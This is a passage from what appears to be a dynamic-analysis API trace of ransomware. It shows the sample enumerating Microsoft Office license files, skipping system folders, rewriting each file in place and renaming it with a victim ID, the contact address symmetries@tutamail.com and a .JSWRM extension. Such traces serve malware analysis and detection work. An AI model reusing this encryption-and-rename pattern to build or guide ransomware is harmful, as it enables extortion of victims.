lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0104.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.770] CloseHandle (hObject=0x45c) returned 1 [0104.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0104.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0104.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0104.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0104.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0104.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0104.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.771] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription4-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription4-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription4-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0104.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0104.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0104.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.772] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5931e55, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5931e55, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5a3cfb3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x67ad, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Subscription4-ppd.xrm-ms", cAlternateFileName="O3F5C1~1.XRM")) returned 1 [0104.772] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ppd.xrm-ms", lpString2=".") returned 1 [0104.772] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ppd.xrm-ms", lpString2="..") returned 1 [0104.772] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ppd.xrm-ms", lpString2="...") returned 1 [0104.772] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ppd.xrm-ms", lpString2="windows") returned -1 [0104.772] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.772] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.772] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.772] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.772] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.772] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0104.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription4-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0104.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription4-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0104.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0104.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0104.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription4-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0104.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription4-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0104.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0104.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0104.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0104.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0104.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription4-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.773] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=26541) returned 1 [0104.773] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x67a0) returned 0x24c1d0 [0104.773] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x67a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x67a0, lpOverlapped=0x0) returned 1 [0104.776] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.776] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x67a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x67a0, lpOverlapped=0x0) returned 1 [0104.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.776] CloseHandle (hObject=0x45c) returned 1 [0104.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0104.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0104.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0104.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0104.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0104.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0104.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.777] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription4-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription4-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription4-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0104.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0104.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0104.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.778] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5931e55, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5931e55, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5afba39, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d83, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Subscription4-ul-oob.xrm-ms", cAlternateFileName="O370C7~1.XRM")) returned 1 [0104.778] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.778] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.778] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.778] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.778] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.778] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.778] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.778] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.778] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.778] lstrcmpiW (lpString1="O365HomePremR_Subscription4-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0104.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription4-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0104.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription4-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0104.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0104.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0104.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription4-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0104.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription4-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d0a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0104.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0104.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0104.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0104.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0104.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription4-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.779] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11651) returned 1 [0104.779] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0104.779] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0104.786] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.786] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0104.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.786] CloseHandle (hObject=0x45c) returned 1 [0104.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0104.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0104.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0104.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0104.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0104.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0104.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.786] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription4-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription4-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription4-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0104.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0104.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0104.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.787] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5c9f573, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5c9f573, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5d37d8b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Subscription5-pl.xrm-ms", cAlternateFileName="O397F0~1.XRM")) returned 1 [0104.787] lstrcmpiW (lpString1="O365HomePremR_Subscription5-pl.xrm-ms", lpString2=".") returned 1 [0104.787] lstrcmpiW (lpString1="O365HomePremR_Subscription5-pl.xrm-ms", lpString2="..") returned 1 [0104.787] lstrcmpiW (lpString1="O365HomePremR_Subscription5-pl.xrm-ms", lpString2="...") returned 1 [0104.787] lstrcmpiW (lpString1="O365HomePremR_Subscription5-pl.xrm-ms", lpString2="windows") returned -1 [0104.787] lstrcmpiW (lpString1="O365HomePremR_Subscription5-pl.xrm-ms", lpString2="recovery") returned -1 [0104.787] lstrcmpiW (lpString1="O365HomePremR_Subscription5-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.788] lstrcmpiW (lpString1="O365HomePremR_Subscription5-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.788] lstrcmpiW (lpString1="O365HomePremR_Subscription5-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.788] lstrcmpiW (lpString1="O365HomePremR_Subscription5-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.788] lstrcmpiW (lpString1="O365HomePremR_Subscription5-pl.xrm-ms", lpString2="msocache") returned 1 [0104.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0104.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription5-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0104.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription5-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription5-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0104.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0104.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0104.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription5-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0104.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription5-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription5-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0104.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0104.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0104.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0104.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0104.788] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription5-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription5-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 